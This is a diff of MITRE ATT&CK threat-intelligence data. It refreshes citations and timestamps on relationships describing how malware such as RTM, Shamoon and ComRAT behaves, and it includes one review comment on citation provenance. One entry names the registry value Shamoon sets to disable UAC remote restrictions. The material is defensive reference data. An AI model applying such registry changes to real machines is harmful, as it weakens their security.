- "description": "[RTM](https://attack.mitre.org/software/S0148) runs its core DLL file using rundll32.exe.(Citation: ESET RTM Feb 2017)",
+ "description": "[RTM](https://attack.mitre.org/software/S0148) runs its core DLL file using rundll32.exe.(Citation: ESET RTM Feb 2017)(Citation: Unit42 Redaman January 2019)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"external_references": [
{
- "source_name": "ESET RTM Feb 2017",
- "description": "Faou, M. and Boutin, J.. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.",
- "url": "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf"
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf",
+ "description": "Faou, M. and Boutin, J. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.",
+ "source_name": "ESET RTM Feb 2017"
+ },
+ {
+ "source_name": "Unit42 Redaman January 2019",
+ "url": "https://unit42.paloaltonetworks.com/russian-language-malspam-pushing-redaman-banking-malware/",
+ "description": "Duncan, B., Harbison, M. (2019, January 23). Russian Language Malspam Pushing Redaman Banking Malware. Retrieved June 16, 2020."
}
],
"source_ref": "malware--92ec0cbd-2c30-44a2-b270-73f4ec949841",
"relationship_type": "uses",
"target_ref": "attack-pattern--045d0922-2310-4e60-b5e4-3302302cb3c5",
"type": "relationship",
- "modified": "2020-03-16T17:46:57.138Z",
+ "modified": "2020-06-16T20:51:14.126Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -106328,12 +107498,12 @@
"url": "https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-security-labs-monsoon-analysis-report.pdf"
}
],
- "source_ref": "malware--85b39628-204a-48d2-b377-ec368cbcb7ca",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--9efb1ea7-c37b-4595-9640-b7680cd84279",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2017-12-14T16:46:06.044Z"
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "malware--85b39628-204a-48d2-b377-ec368cbcb7ca",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--9efb1ea7-c37b-4595-9640-b7680cd84279"
},
{
"id": "relationship--3a31a022-8bb1-4102-9c9a-7289febdcc5c",
@@ -106401,22 +107571,27 @@
{
"id": "relationship--a83182d2-b619-4ca4-984b-21ecfe43da26",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[RTM](https://attack.mitre.org/software/S0148) monitors browsing activity and automatically captures screenshots if a victim browses to a URL matching one of a list of strings.(Citation: ESET RTM Feb 2017)",
+ "description": "[RTM](https://attack.mitre.org/software/S0148) monitors browsing activity and automatically captures screenshots if a victim browses to a URL matching one of a list of strings.(Citation: ESET RTM Feb 2017)(Citation: Unit42 Redaman January 2019)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"external_references": [
{
- "source_name": "ESET RTM Feb 2017",
- "description": "Faou, M. and Boutin, J.. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.",
- "url": "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf"
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf",
+ "description": "Faou, M. and Boutin, J. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.",
+ "source_name": "ESET RTM Feb 2017"
+ },
+ {
+ "source_name": "Unit42 Redaman January 2019",
+ "url": "https://unit42.paloaltonetworks.com/russian-language-malspam-pushing-redaman-banking-malware/",
+ "description": "Duncan, B., Harbison, M. (2019, January 23). Russian Language Malspam Pushing Redaman Banking Malware. Retrieved June 16, 2020."
}
],
"source_ref": "malware--92ec0cbd-2c30-44a2-b270-73f4ec949841",
"relationship_type": "uses",
"target_ref": "attack-pattern--30208d3e-0d6b-43c8-883e-44462a514619",
"type": "relationship",
- "modified": "2020-03-16T17:46:57.140Z",
+ "modified": "2020-06-16T20:51:14.106Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -106514,14 +107689,14 @@
{
"source_name": "Kaspersky Regin",
"description": "Kaspersky Lab's Global Research and Analysis Team. (2014, November 24). THE REGIN PLATFORM NATION-STATE OWNAGE OF GSM NETWORKS. Retrieved December 1, 2014.",
- "url": "https://securelist.com/files/2014/11/Kaspersky_Lab_whitepaper_Regin_platform_eng.pdf"
+ "url": "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08070305/Kaspersky_Lab_whitepaper_Regin_platform_eng.pdf"
}
],
"source_ref": "malware--4c59cce8-cb48-4141-b9f1-f646edfaadb0",
"relationship_type": "uses",
- "target_ref": "attack-pattern--32901740-b42c-4fdd-bc02-345b5dc57082",
+ "target_ref": "attack-pattern--b4b7458f-81f2-4d38-84be-1c5ba0167a52",
"type": "relationship",
- "modified": "2020-03-16T17:37:15.777Z",
+ "modified": "2020-06-29T01:54:53.451Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -106577,14 +107752,14 @@
{
"source_name": "Symantec Waterbug",
"description": "Symantec. (2015, January 26). The Waterbug attack group. Retrieved April 10, 2015.",
- "url": "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/waterbug-attack-group.pdf"
+ "url": "https://www.threatminer.org/report.php?q=waterbug-attack-group.pdf&y=2015#gsc.tab=0&gsc.q=waterbug-attack-group.pdf&gsc.page=1"
}
],
"source_ref": "malware--80a014ba-3fef-4768-990b-37d8bd10d7f4",
"relationship_type": "uses",
"target_ref": "attack-pattern--deb98323-e13f-4b0c-8d94-175379069062",
"type": "relationship",
- "modified": "2018-10-17T00:14:20.652Z",
+ "modified": "2020-06-29T13:27:46.666Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
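Review bot: The replacement citation URL for "Symantec Waterbug" now resolves through a third-party aggregator (threatminer.org) and carries a Google Custom Search fragment (`#gsc.tab=0&gsc.q=...&gsc.page=1`) rather than pointing at Symantec or an archived copy of the original PDF. Downstream consumers treat `external_references` as the evidentiary basis for a `uses` relationship, so a mirror whose content can change or disappear outside the publisher's control weakens that provenance compared with the vendor URL that was removed. I would prefer the original Symantec URL or, if it is dead, a web.archive.org snapshot of it; at minimum the search fragment should be dropped, e.g. `"url": "https://www.threatminer.org/report.php?q=waterbug-attack-group.pdf&y=2015"`. The relationship object's opening lines (id, created_by_ref, object_marking_refs) are outside this hunk, so I cannot tell whether other references on the same object were changed the same way.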
@@ -106748,12 +107923,12 @@
"url": "https://technet.microsoft.com/en-us/library/bb491010.aspx"
}
],
- "source_ref": "tool--2e45723a-31da-4a7e-aaa6-e01998a6788f",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2017-12-14T16:46:06.044Z"
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "tool--2e45723a-31da-4a7e-aaa6-e01998a6788f",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580"
},
{
"id": "relationship--216c15b0-3091-49f2-ba85-356d56265671",
@@ -106916,12 +108091,12 @@
"url": "https://researchcenter.paloaltonetworks.com/2018/01/unit42-comnie-continues-target-organizations-east-asia/"
}
],
- "source_ref": "malware--f4c80d39-ce10-4f74-9b50-a7e3f5df1f2e",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-10-17T00:14:20.652Z"
+ "created": "2018-10-17T00:14:20.652Z",
+ "source_ref": "malware--f4c80d39-ce10-4f74-9b50-a7e3f5df1f2e",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e"
},
{
"id": "relationship--6e422de0-d8c4-41f8-acdd-d433e14e32a3",
@@ -107217,7 +108392,7 @@
{
"id": "relationship--023ff141-8ed7-4132-85a0-494fe075236b",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[Magic Hound](https://attack.mitre.org/groups/G0059) malware is capable of keylogging.(Citation: Unit 42 Magic Hound Feb 2017)",
+ "description": "[Magic Hound](https://attack.mitre.org/groups/G0059) malware is capable of keylogging.(Citation: Unit 42 Magic Hound Feb 2017) [Magic Hound](https://attack.mitre.org/groups/G0059) used CWoolger and MPK, custom-developed malware, which recorded all keystrokes on an infected system.(Citation: Check Point Rocket Kitten)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
@@ -107226,13 +108401,18 @@
"source_name": "Unit 42 Magic Hound Feb 2017",
"description": "Lee, B. and Falcone, R. (2017, February 15). Magic Hound Campaign Attacks Saudi Targets. Retrieved December 27, 2017.",
"url": "https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/"
+ },
+ {
+ "source_name": "Check Point Rocket Kitten",
+ "url": "https://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdf",
+ "description": "Check Point Software Technologies. (2015). ROCKET KITTEN: A CAMPAIGN WITH 9 LIVES. Retrieved March 16, 2018."
}
],
"source_ref": "intrusion-set--f9d6633a-55e6-4adc-9263-6ae080421a13",
"relationship_type": "uses",
"target_ref": "attack-pattern--09a60ea3-a8d1-4ae5-976e-5783248b72a4",
"type": "relationship",
- "modified": "2020-03-16T20:12:11.427Z",
+ "modified": "2020-07-04T22:55:43.624Z",
"created": "2018-01-16T16:13:52.465Z"
},
{
@@ -107307,16 +108487,16 @@
],
"external_references": [
{
- "source_name": "McAfee Gold Dragon",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/",
"description": "Sherstobitoff, R., Saavedra-Morales, J. (2018, February 02). Gold Dragon Widens Olympics Malware Attacks, Gains Permanent Presence on Victims\u2019 Systems. Retrieved June 6, 2018.",
- "url": "https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/"
+ "source_name": "McAfee Gold Dragon"
}
],
"source_ref": "malware--b9799466-9dd7-4098-b2d6-f999ce50b9a8",
"relationship_type": "uses",
"target_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161",
"type": "relationship",
- "modified": "2020-03-17T01:25:46.717Z",
+ "modified": "2020-04-21T23:09:31.590Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -107534,7 +108714,7 @@
],
"external_references": [
{
- "url": "https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/",
"description": "Sherstobitoff, R. (2018, March 02). McAfee Uncovers Operation Honeybee, a Malicious Document Campaign Targeting Humanitarian Aid Groups. Retrieved May 16, 2018.",
"source_name": "McAfee Honeybee"
}
@@ -107543,7 +108723,7 @@
"relationship_type": "uses",
"target_ref": "attack-pattern--32901740-b42c-4fdd-bc02-345b5dc57082",
"type": "relationship",
- "modified": "2019-03-25T12:58:44.284Z",
+ "modified": "2020-04-16T19:41:40.647Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -108244,27 +109424,32 @@
{
"id": "relationship--af9347a3-00a9-4ece-b075-8c55bd4f4b9b",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "Once [Shamoon](https://attack.mitre.org/software/S0140) has access to a network share, it enables the RemoteRegistry service on the target system. It will then connect to the system with RegConnectRegistryW and modify the Registry to disable UAC remote restrictions by setting SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\LocalAccountTokenFilterPolicy to 1.(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)",
+ "description": "Once [Shamoon](https://attack.mitre.org/software/S0140) has access to a network share, it enables the RemoteRegistry service on the target system. It will then connect to the system with RegConnectRegistryW and modify the Registry to disable UAC remote restrictions by setting SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\LocalAccountTokenFilterPolicy to 1.(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: McAfee Shamoon December 2018)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"external_references": [
{
- "source_name": "FireEye Shamoon Nov 2016",
+ "url": "https://www.fireeye.com/blog/threat-research/2016/11/fireeye_respondsto.html",
"description": "FireEye. (2016, November 30). FireEye Responds to Wave of Destructive Cyber Attacks in Gulf Region. Retrieved January 11, 2017.",
- "url": "https://www.fireeye.com/blog/threat-research/2016/11/fireeye_respondsto.html"
+ "source_name": "FireEye Shamoon Nov 2016"
},
{
- "source_name": "Palo Alto Shamoon Nov 2016",
+ "url": "http://researchcenter.paloaltonetworks.com/2016/11/unit42-shamoon-2-return-disttrack-wiper/",
"description": "Falcone, R.. (2016, November 30). Shamoon 2: Return of the Disttrack Wiper. Retrieved January 11, 2017.",
- "url": "http://researchcenter.paloaltonetworks.com/2016/11/unit42-shamoon-2-return-disttrack-wiper/"
+ "source_name": "Palo Alto Shamoon Nov 2016"
+ },
+ {
+ "source_name": "McAfee Shamoon December 2018",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/shamoon-returns-to-wipe-systems-in-middle-east-europe/",
+ "description": "Mundo, A., Roccia, T., Saavedra-Morales, J., Beek, C.. (2018, December 14). Shamoon Returns to Wipe Systems in Middle East, Europe . Retrieved May 29, 2020."
}
],
"source_ref": "malware--8901ac23-6b50-410c-b0dd-d8174a86f9b3",
"relationship_type": "uses",
"target_ref": "attack-pattern--57340c81-c025-4189-8fa0-fc7ede51bae4",
"type": "relationship",
- "modified": "2019-04-24T23:59:16.365Z",
+ "modified": "2020-05-29T18:11:24.821Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -108281,12 +109466,12 @@
"url": "https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf"
}
],
- "source_ref": "malware--4189a679-72ed-4a89-a57c-7f689712ecf8",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-04-18T17:59:24.739Z"
+ "created": "2018-04-18T17:59:24.739Z",
+ "source_ref": "malware--4189a679-72ed-4a89-a57c-7f689712ecf8",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add"
},
{
"id": "relationship--55df3b40-b130-4313-9064-6b0fc56564d0",
@@ -108382,7 +109567,7 @@
"relationship_type": "mitigates",
"target_ref": "attack-pattern--42e8de7b-37b2-4258-905a-6897815e58e0",
"type": "relationship",
- "modified": "2020-03-29T20:10:19.367Z",
+ "modified": "2020-07-09T13:54:28.892Z",
"created": "2017-05-31T21:33:27.021Z"
},
{
@@ -108493,16 +109678,16 @@
],
"external_references": [
{
- "source_name": "McAfee Gold Dragon",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/",
"description": "Sherstobitoff, R., Saavedra-Morales, J. (2018, February 02). Gold Dragon Widens Olympics Malware Attacks, Gains Permanent Presence on Victims\u2019 Systems. Retrieved June 6, 2018.",
- "url": "https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/"
+ "source_name": "McAfee Gold Dragon"
}
],
"source_ref": "malware--28b97733-ef07-4414-aaa5-df50b2d30cc5",
"relationship_type": "uses",
"target_ref": "attack-pattern--fb8d023d-45be-47e9-bc51-f56bcae6435b",
"type": "relationship",
- "modified": "2020-03-17T03:05:29.194Z",
+ "modified": "2020-04-21T23:09:31.619Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -108587,16 +109772,16 @@
],
"external_references": [
{
- "source_name": "McAfee Gold Dragon",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/",
"description": "Sherstobitoff, R., Saavedra-Morales, J. (2018, February 02). Gold Dragon Widens Olympics Malware Attacks, Gains Permanent Presence on Victims\u2019 Systems. Retrieved June 6, 2018.",
- "url": "https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/"
+ "source_name": "McAfee Gold Dragon"
}
],
"source_ref": "malware--b9799466-9dd7-4098-b2d6-f999ce50b9a8",
"relationship_type": "uses",
"target_ref": "attack-pattern--53ac20cd-aca3-406e-9aa0-9fc7fdc60a5a",
"type": "relationship",
- "modified": "2020-03-30T02:55:39.135Z",
+ "modified": "2020-04-21T23:09:31.587Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -108734,7 +109919,7 @@
],
"external_references": [
{
- "url": "https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/",
"description": "Sherstobitoff, R. (2018, March 02). McAfee Uncovers Operation Honeybee, a Malicious Document Campaign Targeting Humanitarian Aid Groups. Retrieved May 16, 2018.",
"source_name": "McAfee Honeybee"
}
@@ -108743,7 +109928,7 @@
"relationship_type": "uses",
"target_ref": "attack-pattern--f1951e8a-500e-4a26-8803-76d95c4554b4",
"type": "relationship",
- "modified": "2019-03-25T12:58:44.289Z",
+ "modified": "2020-04-16T19:41:40.815Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -108791,22 +109976,27 @@
{
"id": "relationship--af74c0ec-0bbe-4538-a3a3-1e967afd3d51",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[RTM](https://attack.mitre.org/software/S0148) can add a certificate to the Windows store.(Citation: ESET RTM Feb 2017)",
+ "description": "[RTM](https://attack.mitre.org/software/S0148) can add a certificate to the Windows store.(Citation: ESET RTM Feb 2017)(Citation: Unit42 Redaman January 2019)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"external_references": [
{
- "source_name": "ESET RTM Feb 2017",
- "description": "Faou, M. and Boutin, J.. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.",
- "url": "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf"
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf",
+ "description": "Faou, M. and Boutin, J. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.",
+ "source_name": "ESET RTM Feb 2017"
+ },
+ {
+ "source_name": "Unit42 Redaman January 2019",
+ "url": "https://unit42.paloaltonetworks.com/russian-language-malspam-pushing-redaman-banking-malware/",
+ "description": "Duncan, B., Harbison, M. (2019, January 23). Russian Language Malspam Pushing Redaman Banking Malware. Retrieved June 16, 2020."
}
],
"source_ref": "malware--92ec0cbd-2c30-44a2-b270-73f4ec949841",
"relationship_type": "uses",
"target_ref": "attack-pattern--c615231b-f253-4f58-9d47-d5b4cbdb6839",
"type": "relationship",
- "modified": "2020-03-16T17:46:57.154Z",
+ "modified": "2020-06-16T20:51:14.280Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -109278,12 +110468,12 @@
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
- "source_ref": "intrusion-set--68ba94ab-78b8-43e7-83e2-aed3466882c6",
- "relationship_type": "revoked-by",
- "target_ref": "intrusion-set--4ca1929c-7d64-4aab-b849-badbfc0c760d",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-10-17T00:14:20.652Z"
+ "created": "2018-10-17T00:14:20.652Z",
+ "source_ref": "intrusion-set--68ba94ab-78b8-43e7-83e2-aed3466882c6",
+ "relationship_type": "revoked-by",
+ "target_ref": "intrusion-set--4ca1929c-7d64-4aab-b849-badbfc0c760d"
},
{
"id": "relationship--3dd745f5-1c0c-4376-8850-89679fcd4e31",
@@ -109695,16 +110885,16 @@
],
"external_references": [
{
- "source_name": "McAfee Gold Dragon",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/",
"description": "Sherstobitoff, R., Saavedra-Morales, J. (2018, February 02). Gold Dragon Widens Olympics Malware Attacks, Gains Permanent Presence on Victims\u2019 Systems. Retrieved June 6, 2018.",
- "url": "https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/"
+ "source_name": "McAfee Gold Dragon"
}
],
"source_ref": "malware--28b97733-ef07-4414-aaa5-df50b2d30cc5",
"relationship_type": "uses",
"target_ref": "attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
"type": "relationship",
- "modified": "2020-03-17T00:28:02.240Z",
+ "modified": "2020-04-21T23:09:31.573Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -109846,7 +111036,7 @@
{
"id": "relationship--ce7b27ac-fff6-4d3c-bceb-50c16f462552",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[POWERSTATS](https://attack.mitre.org/software/S0223) can retrieve and execute additional [PowerShell](https://attack.mitre.org/techniques/T1086) payloads from the C2 server.(Citation: FireEye MuddyWater Mar 2018)",
+ "description": "[POWERSTATS](https://attack.mitre.org/software/S0223) can retrieve and execute additional [PowerShell](https://attack.mitre.org/techniques/T1059/001) payloads from the C2 server.(Citation: FireEye MuddyWater Mar 2018)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
@@ -109861,7 +111051,7 @@
"relationship_type": "uses",
"target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add",
"type": "relationship",
- "modified": "2019-04-22T22:36:53.151Z",
+ "modified": "2020-03-31T22:21:47.793Z",
"created": "2018-04-18T17:59:24.739Z"
},
{
@@ -109901,9 +111091,9 @@
],
"source_ref": "malware--c541efb4-e7b1-4ad6-9da8-b4e113f5dd42",
"relationship_type": "uses",
- "target_ref": "attack-pattern--d1fcf083-a721-4223-aedf-bf8960798d62",
+ "target_ref": "attack-pattern--a9d4b653-6915-42af-98b2-5758c4ceee56",
"type": "relationship",
- "modified": "2019-06-24T19:03:52.715Z",
+ "modified": "2020-06-12T17:37:53.694Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -110088,16 +111278,16 @@
],
"external_references": [
{
- "source_name": "McAfee Gold Dragon",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/",
"description": "Sherstobitoff, R., Saavedra-Morales, J. (2018, February 02). Gold Dragon Widens Olympics Malware Attacks, Gains Permanent Presence on Victims\u2019 Systems. Retrieved June 6, 2018.",
- "url": "https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/"
+ "source_name": "McAfee Gold Dragon"
}
],
"source_ref": "malware--60d50676-459a-47dd-92e9-a827a9fe9c58",
"relationship_type": "uses",
"target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1",
"type": "relationship",
- "modified": "2020-02-18T03:54:11.630Z",
+ "modified": "2020-04-21T23:09:31.616Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -110413,12 +111603,12 @@
"url": "https://www.symantec.com/security_response/writeup.jsp?docid=2012-061518-4639-99"
}
],
- "source_ref": "malware--48523614-309e-43bf-a2b8-705c2b45d7b2",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-04-18T17:59:24.739Z"
+ "created": "2018-04-18T17:59:24.739Z",
+ "source_ref": "malware--48523614-309e-43bf-a2b8-705c2b45d7b2",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e"
},
{
"id": "relationship--87b74ba7-99c4-464c-86d2-1dd8c8b578b1",
@@ -110554,16 +111744,16 @@
],
"external_references": [
{
- "source_name": "McAfee Gold Dragon",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/",
"description": "Sherstobitoff, R., Saavedra-Morales, J. (2018, February 02). Gold Dragon Widens Olympics Malware Attacks, Gains Permanent Presence on Victims\u2019 Systems. Retrieved June 6, 2018.",
- "url": "https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/"
+ "source_name": "McAfee Gold Dragon"
}
],
"source_ref": "malware--60d50676-459a-47dd-92e9-a827a9fe9c58",
"relationship_type": "uses",
"target_ref": "attack-pattern--ac08589e-ee59-4935-8667-d845e38fe579",
"type": "relationship",
- "modified": "2020-02-18T03:54:11.641Z",
+ "modified": "2020-04-21T23:09:31.607Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -110671,7 +111861,7 @@
{
"id": "relationship--0a65c303-52a6-4624-a8fb-fc7448429139",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[Winnti](https://attack.mitre.org/software/S0141) sets its DLL file as a new service in the Registry to establish persistence.(Citation: Microsoft Winnti Jan 2017)",
+ "description": "[Winnti for Windows](https://attack.mitre.org/software/S0141) sets its DLL file as a new service in the Registry to establish persistence.(Citation: Microsoft Winnti Jan 2017)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
@@ -110686,7 +111876,7 @@
"relationship_type": "uses",
"target_ref": "attack-pattern--2959d63f-73fd-46a1-abd2-109d7dcede32",
"type": "relationship",
- "modified": "2018-10-17T00:14:20.652Z",
+ "modified": "2020-04-30T18:45:04.769Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -110797,12 +111987,12 @@
"url": "http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp_the_taidoor_campaign.pdf"
}
],
- "source_ref": "intrusion-set--59140a2e-d117-4206-9b2c-2a8662bd9d46",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2017-05-31T21:33:27.048Z"
+ "created": "2017-05-31T21:33:27.048Z",
+ "source_ref": "intrusion-set--59140a2e-d117-4206-9b2c-2a8662bd9d46",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5"
},
{
"id": "relationship--98d076a5-9640-4337-a5a0-27c0c8a3374b",
@@ -110855,7 +112045,7 @@
],
"external_references": [
{
- "url": "https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/",
"description": "Sherstobitoff, R. (2018, March 02). McAfee Uncovers Operation Honeybee, a Malicious Document Campaign Targeting Humanitarian Aid Groups. Retrieved May 16, 2018.",
"source_name": "McAfee Honeybee"
}
@@ -110864,7 +112054,7 @@
"relationship_type": "uses",
"target_ref": "attack-pattern--9a60a291-8960-4387-8a4a-2ab5c18bb50b",
"type": "relationship",
- "modified": "2020-03-17T01:33:43.518Z",
+ "modified": "2020-04-16T19:41:40.702Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -111111,22 +112301,27 @@
{
"id": "relationship--1782abeb-8d28-42a1-8abe-c137f23b282c",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[ComRAT](https://attack.mitre.org/software/S0126) has used HTTP requests for command and control.(Citation: NorthSec 2015 GData Uroburos Tools)",
+ "description": "[ComRAT](https://attack.mitre.org/software/S0126) has used HTTP requests for command and control.(Citation: NorthSec 2015 GData Uroburos Tools)(Citation: ESET ComRAT May 2020)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"external_references": [
{
- "url": "https://www.nsec.io/wp-content/uploads/2015/05/uroburos-actors-tools-1.1.pdf",
+ "source_name": "NorthSec 2015 GData Uroburos Tools",
"description": "Rascagneres, P. (2015, May). Tools used by the Uroburos actors. Retrieved August 18, 2016.",
- "source_name": "NorthSec 2015 GData Uroburos Tools"
+ "url": "https://docplayer.net/101655589-Tools-used-by-the-uroburos-actors.html"
+ },
+ {
+ "source_name": "ESET ComRAT May 2020",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf",
